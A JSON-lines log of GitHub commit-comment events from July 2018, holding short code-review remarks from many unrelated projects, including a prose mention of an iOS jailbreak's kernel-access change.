{"id":"7921603356","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"malarozi/iOS-11.1.2-15B202-Jailbreak"},"payload":{"comment":{"id":29602733,"position":13,"line":105,"path":"async_wake_ios.xcodeproj/project.pbxproj","commit_id":"48cffc35f3ec37ef10c19c447c7a975442722257","created_at":"2018-07-05T08:07:05Z","updated_at":"2018-07-05T08:07:05Z","author_association":"OWNER","body":"committed on 9 Feb"}},"created_at":"2018-07-05T08:07:05Z"}
{"id":"7921608011","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602743,"position":44,"line":59,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T08:08:04Z","updated_at":"2018-07-05T08:08:04Z","author_association":"NONE","body":"In general, your whole creation of triples is depending on several assumptions that may not hold. Thus, it is bound to a specific use case, i.e., a URI is crawled and stored in a graph in a SPARQL endpoint. However, what happens if we are using a file based sink?"}},"created_at":"2018-07-05T08:08:04Z"}
{"id":"7921609085","type":"CommitCommentEvent","actor":{"login":"JimLahalllo"},"repo":{"name":"JimLahalllo/Monitoring-dan-Progress-KP-Mahasiswa"},"payload":{"comment":{"id":29602747,"position":null,"line":null,"path":null,"commit_id":"ae9401581284fb6ee08db30f9f4ae5c06ade4317","created_at":"2018-07-05T08:08:18Z","updated_at":"2018-07-05T08:08:18Z","author_association":"OWNER","body":"**Road Map Kerja Praktek**\r\n[ROAD MAP KERJA PRAKTEK.pdf](https://github.com/JimLahalllo/Monitoring-dan-Progress-KP-Mahasiswa/files/2165573/ROAD.MAP.KERJA.PRAKTEK.pdf)\r\n"}},"created_at":"2018-07-05T08:08:18Z"}
{"id":"7921609988","type":"CommitCommentEvent","actor":{"login":"dutscher"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":29602749,"position":null,"line":null,"path":null,"commit_id":"2a46fe95d5611459a0a940b403b78dc1aca69b39","created_at":"2018-07-05T08:08:29Z","updated_at":"2018-07-05T08:08:29Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-05T08:08:29Z"}
{"id":"7921618505","type":"CommitCommentEvent","actor":{"login":"ppatierno"},"repo":{"name":"strimzi/strimzi-kafka-operator"},"payload":{"comment":{"id":29602761,"position":1,"line":1,"path":"docker-images/stunnel/Dockerfile","commit_id":"6077a7ffef80af4a335cd518f1cb9ee961afeffb","created_at":"2018-07-05T08:10:20Z","updated_at":"2018-07-05T08:10:20Z","author_association":"MEMBER","body":"@kyguy as I mentioned via email, I think that we don't need a full Kafka image but just a centos then installing stunnel."}},"created_at":"2018-07-05T08:10:20Z"}
{"id":"7921620717","type":"CommitCommentEvent","actor":{"login":"coolfire2015"},"repo":{"name":"HuYingBao/PadRxFlux"},"payload":{"comment":{"id":29602765,"position":null,"line":null,"path":null,"commit_id":"39d26f4d6d7a829956523ad28f6a8229edbf2761","created_at":"2018-07-05T08:10:45Z","updated_at":"2018-07-05T08:10:45Z","author_association":"COLLABORATOR","body":"阿斯蒂芬"}},"created_at":"2018-07-05T08:10:45Z"}
{"id":"7921621932","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602770,"position":14,"line":61,"path":"src/main/java/org/aksw/simba/squirrel/sink/impl/sparql/SparqlBasedSink.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T08:10:59Z","updated_at":"2018-07-05T08:10:59Z","author_association":"NONE","body":"Is this method really necessary? You are retrieving the host in a different way in your crawling activity. Apart from that, the method implementation seems to be wrong since it does not simply return the host but a complete URL."}},"created_at":"2018-07-05T08:10:59Z"}
{"id":"7921623037","type":"CommitCommentEvent","actor":{"login":"Dezaimasu"},"repo":{"name":"Dezaimasu/cute-button"},"payload":{"comment":{"id":29602773,"position":null,"line":null,"path":null,"commit_id":"d9e7e71b84e6f97e628958f97a03e24622ad4776","created_at":"2018-07-05T08:11:15Z","updated_at":"2018-07-05T08:11:15Z","author_association":"OWNER","body":"According to anon, the raws are not available for old images (somewhere pre-2012), so the download will fail. Never stumbled upon something this old, so don't know if it's true. \r\nThere's an option now 51e206f3ce86d3f6ebb9365253489ea87f4cdd87 to disable this feature in case someone need to download old images."}},"created_at":"2018-07-05T08:11:15Z"}
{"id":"7921623842","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29602775,"position":4,"line":4,"path":"ruby_module_8/cargo_wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:11:25Z","updated_at":"2018-07-05T08:11:25Z","author_association":"NONE","body":"Это замаскированные putsы?) путсы в интерфэйс в любом виде"}},"created_at":"2018-07-05T08:11:25Z"}
{"id":"7921625788","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29602780,"position":15,"line":21,"path":"lesson7/validation_methods.rb","commit_id":"2e82432d854436dd0188f249bf8c1f125cb7dd60","created_at":"2018-07-05T08:11:50Z","updated_at":"2018-07-05T08:11:50Z","author_association":"NONE","body":"отвечаю на твой комментарий в Тичбейзе:\r\n\r\n> Я полагал, что valid? это метод для проверки уже существующих инстансов. Но как инстанс пройдет проверку на уникальность идентификатора, если проверка заключается в отсутствии среди имеющихся объектов экземпляра с таким атрибутом?\r\n\r\nв текущем виде твоего метода инстанс проверку не пройдет\r\nи это не единственный недостаток метода )))\r\nвторой недостаток - он опирается на предположение о том, что у класса есть метод `find`... что тоже не всегда гарантированно )) но опустим этот момент пока...\r\nчтобы валидация работала правильно для существующих объектов нужно добавить в нее проверку на то что объект, который вернулся из метода `self.class.finc(attribute)` не равен `self`\r\nтаким образом ты будешь проверять именно дублирование аттрибута у других объектов класса"}},"created_at":"2018-07-05T08:11:50Z"}
{"id":"7921626769","type":"CommitCommentEvent","actor":{"login":"kjy1111"},"repo":{"name":"kjy1111/mysite"},"payload":{"comment":{"id":29602784,"position":null,"line":null,"path":null,"commit_id":"18576cff2109afe4af944fcdc0aaf406f031dddc","created_at":"2018-07-05T08:12:03Z","updated_at":"2018-07-05T08:12:03Z","author_association":"OWNER","body":"방명록 구현"}},"created_at":"2018-07-05T08:12:03Z"}
{"id":"7921628894","type":"CommitCommentEvent","actor":{"login":"kijin"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29602785,"position":null,"line":null,"path":null,"commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T08:12:28Z","updated_at":"2018-07-05T08:12:28Z","author_association":"MEMBER","body":"이건 최대한 오랫동안 지원하지 않고 버티려고 했는데요... #950\r\n\r\n이 기능을 활용해서 만들어진 서드파티 자료가 당장 내일도 정상적으로 작동한다고는 결코 보장할 수 없습니다. 공통 CSS, JS는 수시로 그리고 임의로 추가, 변경, 삭제될 것입니다."}},"created_at":"2018-07-05T08:12:28Z"}
{"id":"7921628918","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"malarozi/iOS-11.1.2-15B202-Jailbreak"},"payload":{"comment":{"id":29602786,"position":9,"line":10,"path":"README.md","commit_id":"f10b80883ed35503730c95ecec6afd96f03f0ffa","created_at":"2018-07-05T08:12:29Z","updated_at":"2018-07-05T08:12:29Z","author_association":"OWNER","body":"Several stability bugs have been fixed, tfp0 is now inserted into hsp4 so any application running as root has kernel access. The live kernel introspection webserver has been moved out of the jailbreak and into a binary dropped on the system, and relies on hsp4 for kernel access."}},"created_at":"2018-07-05T08:12:29Z"}
{"id":"7921631126","type":"CommitCommentEvent","actor":{"login":"Justgozz"},"repo":{"name":"Justgozz/first"},"payload":{"comment":{"id":29602787,"position":null,"line":null,"path":null,"commit_id":"00daf1c8acd6ceaf51842e0b48a3162bee36f7f0","created_at":"2018-07-05T08:12:56Z","updated_at":"2018-07-05T08:12:56Z","author_association":"OWNER","body":"试着在第一个版本上做点小修改"}},"created_at":"2018-07-05T08:12:56Z"}
{"id":"7921631851","type":"CommitCommentEvent","actor":{"login":"danybony"},"repo":{"name":"novoda/download-manager"},"payload":{"comment":{"id":29602788,"position":null,"line":null,"path":null,"commit_id":"e28191d146ed20fef3819ee59b83c7b35e84714b","created_at":"2018-07-05T08:13:05Z","updated_at":"2018-07-05T08:13:05Z","author_association":"CONTRIBUTOR","body":"👌 "}},"created_at":"2018-07-05T08:13:05Z"}
{"id":"7921633272","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29602789,"position":4,"line":172,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:13:22Z","updated_at":"2018-07-05T08:13:22Z","author_association":"MEMBER","body":"You have a typo for `resoureceType` ;)"}},"created_at":"2018-07-05T08:13:22Z"}
{"id":"7921636526","type":"CommitCommentEvent","actor":{"login":"Jo-Seong-Hwan"},"repo":{"name":"teg1434/homepage"},"payload":{"comment":{"id":29602803,"position":29,"line":29,"path":"main.html","commit_id":"a38f5ee46e34d191589cd605ee1a6f3bf4f8c473","created_at":"2018-07-05T08:14:03Z","updated_at":"2018-07-05T08:14:03Z","author_association":"NONE","body":"ㅎㅇ"}},"created_at":"2018-07-05T08:14:03Z"}
{"id":"7921636804","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602805,"position":34,"line":77,"path":"src/main/java/org/aksw/simba/squirrel/metadata/CrawlingActivity.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:14:07Z","updated_at":"2018-07-05T08:14:07Z","author_association":"NONE","body":"Implementing it that way was better than creating a new `SimpleDateFormat` instance every time somebody is calling the `getDateStarted` or `getDateEnded` methods. However, it is not a real issue."}},"created_at":"2018-07-05T08:14:07Z"}
{"id":"7921637488","type":"CommitCommentEvent","actor":{"login":"Jo-Seong-Hwan"},"repo":{"name":"teg1434/homepage"},"payload":{"comment":{"id":29602806,"position":26,"line":26,"path":"main.html","commit_id":"a38f5ee46e34d191589cd605ee1a6f3bf4f8c473","created_at":"2018-07-05T08:14:15Z","updated_at":"2018-07-05T08:14:15Z","author_association":"NONE","body":"뭐지"}},"created_at":"2018-07-05T08:14:15Z"}
{"id":"7921639458","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29602808,"position":8,"line":176,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:14:39Z","updated_at":"2018-07-05T08:14:39Z","author_association":"MEMBER","body":"Should we move this method to ResourceType?\r\n\r\nThis would allow to not have duplication with the \"If\"s in XWikiDocument too at line 5141."}},"created_at":"2018-07-05T08:14:39Z"}
{"id":"7921643576","type":"CommitCommentEvent","actor":{"login":"RIKOje"},"repo":{"name":"RIKOje/skurONE"},"payload":{"comment":{"id":29602816,"position":16,"line":14,"path":"skur/src/main/java/Playground.java","commit_id":"27e9fb13b8e4b23d349e2ddef70d2e68abf1f703","created_at":"2018-07-05T08:15:28Z","updated_at":"2018-07-05T08:15:28Z","author_association":"OWNER","body":"**Remember giving the options!**"}},"created_at":"2018-07-05T08:15:28Z"}
{"id":"7921647713","type":"CommitCommentEvent","actor":{"login":"davidfokkema"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":29602830,"position":null,"line":null,"path":null,"commit_id":"06d3e611ae774720ae7b65dfd58336fbfc9ca180","created_at":"2018-07-05T08:16:20Z","updated_at":"2018-07-05T08:16:20Z","author_association":"MEMBER","body":"So I did! 😳 Sorry."}},"created_at":"2018-07-05T08:16:20Z"}
{"id":"7921648689","type":"CommitCommentEvent","actor":{"login":"ppatierno"},"repo":{"name":"strimzi/strimzi-kafka-operator"},"payload":{"comment":{"id":29602834,"position":3,"line":3,"path":"docker-images/stunnel/scripts/stunnel_run.sh","commit_id":"6077a7ffef80af4a335cd518f1cb9ee961afeffb","created_at":"2018-07-05T08:16:32Z","updated_at":"2018-07-05T08:16:32Z","author_association":"MEMBER","body":"@kyguy I guess that this certificate isn't enough. The Zookeeper node has its own private and public certificate which are signed by internal-ca.crt. When another peer connects to this node, the stunnel has to know this two info in order to do the TLS exchange. Does stunnel wants just cert and not private key? Does it want the node cert + CA cert (used for signing) ?"}},"created_at":"2018-07-05T08:16:32Z"}
{"id":"7921648962","type":"CommitCommentEvent","actor":{"login":"ikzzi"},"repo":{"name":"weedahm/weedahmWeb"},"payload":{"comment":{"id":29602838,"position":null,"line":null,"path":null,"commit_id":"226992e60d8a547f21f9f596333cf447a128bec2","created_at":"2018-07-05T08:16:35Z","updated_at":"2018-07-05T08:16:35Z","author_association":"CONTRIBUTOR","body":"wow! awesome !!"}},"created_at":"2018-07-05T08:16:35Z"}
{"id":"7921648979","type":"CommitCommentEvent","actor":{"login":"Justgozz"},"repo":{"name":"Justgozz/first"},"payload":{"comment":{"id":29602839,"position":2,"line":2,"path":"README.md","commit_id":"00daf1c8acd6ceaf51842e0b48a3162bee36f7f0","created_at":"2018-07-05T08:16:35Z","updated_at":"2018-07-05T08:16:35Z","author_association":"OWNER","body":"好像还是不太懂"}},"created_at":"2018-07-05T08:16:35Z"}
{"id":"7921650751","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"malarozi/iOS-11.1.2-15B202-Jailbreak"},"payload":{"comment":{"id":29602851,"position":13,"line":13,"path":"README.md","commit_id":"f10b80883ed35503730c95ecec6afd96f03f0ffa","created_at":"2018-07-05T08:16:58Z","updated_at":"2018-07-05T08:16:58Z","author_association":"OWNER","body":"Several stability bugs have been fixed, tfp0 is now inserted into hsp4 so any application running as root has kernel access. The live kernel introspection webserver has been moved out of the jailbreak and into a binary dropped on the system, and relies on hsp4 for kernel access."}},"created_at":"2018-07-05T08:16:58Z"}
{"id":"7921653052","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29602864,"position":8,"line":176,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:17:27Z","updated_at":"2018-07-05T08:17:27Z","author_association":"MEMBER","body":"The duplication also exists at https://github.com/xwiki/xwiki-rendering/commit/eefb1430a28ab209d5b30e222d01aefdabfbfa4d#diff-161fb6add1356ad3ecf81a75ebd1d89aL96"}},"created_at":"2018-07-05T08:17:27Z"}
{"id":"7921655219","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29602870,"position":19,"line":19,"path":"ruby_module_8/wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:17:55Z","updated_at":"2018-07-05T08:17:55Z","author_association":"NONE","body":"Пять замаскированные путсы в классе"}},"created_at":"2018-07-05T08:17:55Z"}
{"id":"7921656862","type":"CommitCommentEvent","actor":{"login":"lotstar87"},"repo":{"name":"ThingsElements/things-scene-visualizer"},"payload":{"comment":{"id":29602876,"position":null,"line":null,"path":null,"commit_id":"e38b6eea5e626807b59650db944cbdd1826bb7f5","created_at":"2018-07-05T08:18:15Z","updated_at":"2018-07-05T08:18:15Z","author_association":"MEMBER","body":"closes hatiolab/things-point#98"}},"created_at":"2018-07-05T08:18:15Z"}
{"id":"7921658648","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29602878,"position":8,"line":176,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:18:38Z","updated_at":"2018-07-05T08:18:38Z","author_association":"MEMBER","body":"And https://github.com/xwiki/xwiki-rendering/commit/eefb1430a28ab209d5b30e222d01aefdabfbfa4d#diff-88d0cc69e4ab109dc997b782d1ba5672R120"}},"created_at":"2018-07-05T08:18:38Z"}
{"id":"7921659177","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/Nomenclature-api-module"},"payload":{"comment":{"id":29602880,"position":null,"line":null,"path":null,"commit_id":"9c1d5e972eda8428dc87bfc55696b107d8dc5940","created_at":"2018-07-05T08:18:45Z","updated_at":"2018-07-05T08:18:45Z","author_association":"MEMBER","body":"Ca sert à quelque chose cette nomenclature RACINE avec id_nomenclature = 0 ?"}},"created_at":"2018-07-05T08:18:45Z"}
{"id":"7921661396","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29602887,"position":8,"line":176,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:19:12Z","updated_at":"2018-07-05T08:19:12Z","author_association":"MEMBER","body":"And https://github.com/xwiki/xwiki-rendering/commit/eefb1430a28ab209d5b30e222d01aefdabfbfa4d#diff-4095770d21080ac4990374acd63ad9d3L79\r\n\r\nSo I think it makes sense to move it to ResourceType, WDYT?"}},"created_at":"2018-07-05T08:19:12Z"}
{"id":"7921661576","type":"CommitCommentEvent","actor":{"login":"Barb1982"},"repo":{"name":"w3c/Unicorn"},"payload":{"comment":{"id":29602889,"position":null,"line":null,"path":null,"commit_id":"57805b6284006f012ea094e14eff3afe3b35fd5c","created_at":"2018-07-05T08:19:14Z","updated_at":"2018-07-05T08:19:14Z","author_association":"NONE","body":"[bval-parent-0.5-source-release.zip](https://github.com/w3c/Unicorn/files/2165638/bval-parent-0.5-source-release.zip)\r\nIt"}},"created_at":"2018-07-05T08:19:14Z"}
{"id":"7921664016","type":"CommitCommentEvent","actor":{"login":"strumet"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29602892,"position":null,"line":null,"path":null,"commit_id":"9da149186b0322319a3e7655b90b8b40caeabe3d","created_at":"2018-07-05T08:19:46Z","updated_at":"2018-07-05T08:19:46Z","author_association":"OWNER","body":"Ciao Davide,\r\nhai ragione, l'esercizio EX05 è corretto: deve essermi sfuggito al controllo. Alla prossima revisione (questo fine settimana) lo aggiungerò alla cartella _accepted_works_\r\nHo dato un'occhiata agli esercizi vettoriali successivi: l'EX06 e l'EX07 sembrano corretti. L'EX08 invece non è corretto. Prova a verificarlo.\r\nUn saluto,\r\nmf"}},"created_at":"2018-07-05T08:19:46Z"}
{"id":"7921664073","type":"CommitCommentEvent","actor":{"login":"Inifield"},"repo":{"name":"AscEmu/AscEmu"},"payload":{"comment":{"id":29602893,"position":5,"line":140,"path":"src/world/Units/Players/PlayerCache.h","commit_id":"1ac2315fc723768f43ffbf401032681426addde8","created_at":"2018-07-05T08:19:47Z","updated_at":"2018-07-05T08:19:47Z","author_association":"CONTRIBUTOR","body":"did you mean getCachedMapByField?"}},"created_at":"2018-07-05T08:19:47Z"}
{"id":"7921665970","type":"CommitCommentEvent","actor":{"login":"cgrand"},"repo":{"name":"dupuchba/calendar"},"payload":{"comment":{"id":29602897,"position":36,"line":35,"path":"src/calendar/core.clj","commit_id":"564a8c1b2b18e701f7e6a735cf86db27db704065","created_at":"2018-07-05T08:20:11Z","updated_at":"2018-07-05T08:20:11Z","author_association":"NONE","body":"`(with-meta (symbol name) {:const true})` and maybe even a proper `:tag` meta"}},"created_at":"2018-07-05T08:20:11Z"}
{"id":"7921666623","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602898,"position":27,"line":55,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:20:17Z","updated_at":"2018-07-05T08:20:17Z","author_association":"NONE","body":"Still the same problem as described in https://github.com/varunmaitreya/Squirrel/commit/6dab30fc7ea5025302fc2b6440fd9246f4f73d4b#r29602705"}},"created_at":"2018-07-05T08:20:17Z"}
{"id":"7921667716","type":"CommitCommentEvent","actor":{"login":"Thorin-Oakenpants"},"repo":{"name":"ghacksuserjs/ghacks-user.js"},"payload":{"comment":{"id":29602901,"position":null,"line":null,"path":null,"commit_id":"70abeda9d495edd72d5ca580233af17994e9ba49","created_at":"2018-07-05T08:20:30Z","updated_at":"2018-07-05T08:20:30Z","author_association":"MEMBER","body":"I thought they pushed it to 60.0.2, and now I have no idea if that means stable 60.0.2 got it as well. Is the commit misleading, ambiguous or incorrect?\r\n\r\nAnyway, agreed that it is no longer a problem with current stable esr + FF61. Lets get the info right first though."}},"created_at":"2018-07-05T08:20:30Z"}
{"id":"7921669084","type":"CommitCommentEvent","actor":{"login":"Batchetty"},"repo":{"name":"muggot/openmcu"},"payload":{"comment":{"id":29602907,"position":null,"line":null,"path":null,"commit_id":"1a1e76472eac78041fea554943d15ebf954033f4","created_at":"2018-07-05T08:20:46Z","updated_at":"2018-07-05T08:20:46Z","author_association":"NONE","body":"О боже, я уж подумал что вы в андеграунд подались =) , рад слышать что вы живы =)"}},"created_at":"2018-07-05T08:20:46Z"}
{"id":"7921669321","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602908,"position":26,"line":54,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:20:49Z","updated_at":"2018-07-05T08:20:49Z","author_association":"NONE","body":"Still the same problem as described in https://github.com/varunmaitreya/Squirrel/commit/6dab30fc7ea5025302fc2b6440fd9246f4f73d4b#r29602603"}},"created_at":"2018-07-05T08:20:49Z"}
{"id":"7921670606","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29602909,"position":15,"line":21,"path":"lesson7/validation_methods.rb","commit_id":"2e82432d854436dd0188f249bf8c1f125cb7dd60","created_at":"2018-07-05T08:21:03Z","updated_at":"2018-07-05T08:21:03Z","author_association":"NONE","body":"тут правда возникают еще всякие осложнения... типа, что хорошо бы тогда не один объект искать, а коллекцию, вдруг \"невалидный\" объект как-то уже прокрался, тогда у нас 2 одинаковых ключа и по файнд будет возвращаться только один объект, а второй мы не увидим... ну и т.д.\r\nно предлагаю с этим пока не заморачиваться... это у меня из рельс... там бывают с объектами из базы накладки\r\nа мы будем исходить из предположения, что валидация в инишиалайзе 100% защищает нас от невалидных объектов в коллекции \"олл\", в этом случае предыдущей моей рекомендации должно быть дотстаточно"}},"created_at":"2018-07-05T08:21:03Z"}
{"id":"7921676617","type":"CommitCommentEvent","actor":{"login":"a-sabater"},"repo":{"name":"a-sabater/desarrollo-web"},"payload":{"comment":{"id":29602920,"position":null,"line":null,"path":null,"commit_id":"34fd7009bc74765b6b462814cf62e19997da1e18","created_at":"2018-07-05T08:22:14Z","updated_at":"2018-07-05T08:22:14Z","author_association":"OWNER","body":"Esquema del proyecto realizado en Balsamiq"}},"created_at":"2018-07-05T08:22:14Z"}
{"id":"7921677762","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602923,"position":14,"line":45,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:22:27Z","updated_at":"2018-07-05T08:22:27Z","author_association":"NONE","body":"All your activities will use exactly the same URI (because for all of them the `getUrl` method will create the same URI. That means that you have only one single activity for all crawled URIs! Please fix this."}},"created_at":"2018-07-05T08:22:27Z"}
{"id":"7921678444","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"malarozi/iOS-11.1.2-15B202-Jailbreak"},"payload":{"comment":{"id":29602926,"position":8,"line":8,"path":"async_wake_ios/debugging.c","commit_id":"5c4fddac038a01745ffbd3f7d56d84a3e3cd30a4","created_at":"2018-07-05T08:22:36Z","updated_at":"2018-07-05T08:22:36Z","author_association":"OWNER","body":"cleanup_debugging"}},"created_at":"2018-07-05T08:22:36Z"}
{"id":"7921679547","type":"CommitCommentEvent","actor":{"login":"bertfrees"},"repo":{"name":"sbsdev/pipeline"},"payload":{"comment":{"id":29602929,"position":6,"line":21,"path":".gitignore","commit_id":"6d6ee0b355098903744bd9b0e774dac8a810e49f","created_at":"2018-07-05T08:22:49Z","updated_at":"2018-07-05T08:22:49Z","author_association":"CONTRIBUTOR","body":"Why are these needed? These directories should normally not exist."}},"created_at":"2018-07-05T08:22:49Z"}
{"id":"7921683503","type":"CommitCommentEvent","actor":{"login":"Quake4"},"repo":{"name":"Quake4/MindMiner"},"payload":{"comment":{"id":29602938,"position":null,"line":null,"path":null,"commit_id":"04bc592d58a7d1c7a7ef09e53aec96d3db02fc50","created_at":"2018-07-05T08:23:36Z","updated_at":"2018-07-05T08:23:36Z","author_association":"OWNER","body":"oops, sorry ;)"}},"created_at":"2018-07-05T08:23:36Z"}
{"id":"7921684732","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29602942,"position":11,"line":11,"path":"ruby_module_8/passenger_wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:23:51Z","updated_at":"2018-07-05T08:23:51Z","author_association":"NONE","body":"Если ты знаешь, какого типа вагон, то ты будешь знать что в нем занимаются места. Так-что второй аргумент не нужен. Тем более я тебя там уже попросил убрать путсы"}},"created_at":"2018-07-05T08:23:51Z"}
{"id":"7921685037","type":"CommitCommentEvent","actor":{"login":"agriggio"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29602945,"position":35,"line":4158,"path":"rtengine/procparams.cc","commit_id":"8c3e14b7f0a128d82369ebcbb88abe3ccb930c7d","created_at":"2018-07-05T08:23:56Z","updated_at":"2018-07-05T08:23:56Z","author_association":"COLLABORATOR","body":"@Thanatomanic I agree with you in principle, but as @heckflosse wrote I opted for the current behaviour for backwards compatibility, which I think RT tries hard to preserve whenever possible. Of course, we can decide this is a special case -- in fact I'd vote for that..."}},"created_at":"2018-07-05T08:23:56Z"}
{"id":"7921685704","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602948,"position":16,"line":47,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:24:04Z","updated_at":"2018-07-05T08:24:04Z","author_association":"NONE","body":"Your `getDateStarted` and `getDateEnded` methods can return `null` in case of an error. That should be handled here. In general, I am unhappy with the assumption that all information will be available when you are generating the triples as it was already described in https://github.com/varunmaitreya/Squirrel/commit/6dab30fc7ea5025302fc2b6440fd9246f4f73d4b#r29602743"}},"created_at":"2018-07-05T08:24:04Z"}
{"id":"7921686294","type":"CommitCommentEvent","actor":{"login":"yunpengGit"},"repo":{"name":"yunpengGit/anu-antd-axios-echarts-ie8"},"payload":{"comment":{"id":29602949,"position":null,"line":null,"path":null,"commit_id":"b080cbdc18f8e67d726f8b2bc2242f453598d24f","created_at":"2018-07-05T08:24:11Z","updated_at":"2018-07-05T08:24:11Z","author_association":"OWNER","body":"修改配置文件  :ant:"}},"created_at":"2018-07-05T08:24:11Z"}
{"id":"7921709915","type":"CommitCommentEvent","actor":{"login":"Quake4"},"repo":{"name":"Quake4/MindMiner"},"payload":{"comment":{"id":29603007,"position":null,"line":null,"path":null,"commit_id":"04bc592d58a7d1c7a7ef09e53aec96d3db02fc50","created_at":"2018-07-05T08:28:46Z","updated_at":"2018-07-05T08:28:46Z","author_association":"OWNER","body":"fixed 2.55\r\nIt was get balance."}},"created_at":"2018-07-05T08:28:46Z"}
{"id":"7921710046","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"Mika-5/optimizer-ortools"},"payload":{"comment":{"id":29603008,"position":43,"line":594,"path":"tsp_simple.cc","commit_id":"b54ff9172bbdebe4bc0612c96824904a37053e6e","created_at":"2018-07-05T08:28:47Z","updated_at":"2018-07-05T08:28:47Z","author_association":"NONE","body":"Is it necessary ?"}},"created_at":"2018-07-05T08:28:47Z"}
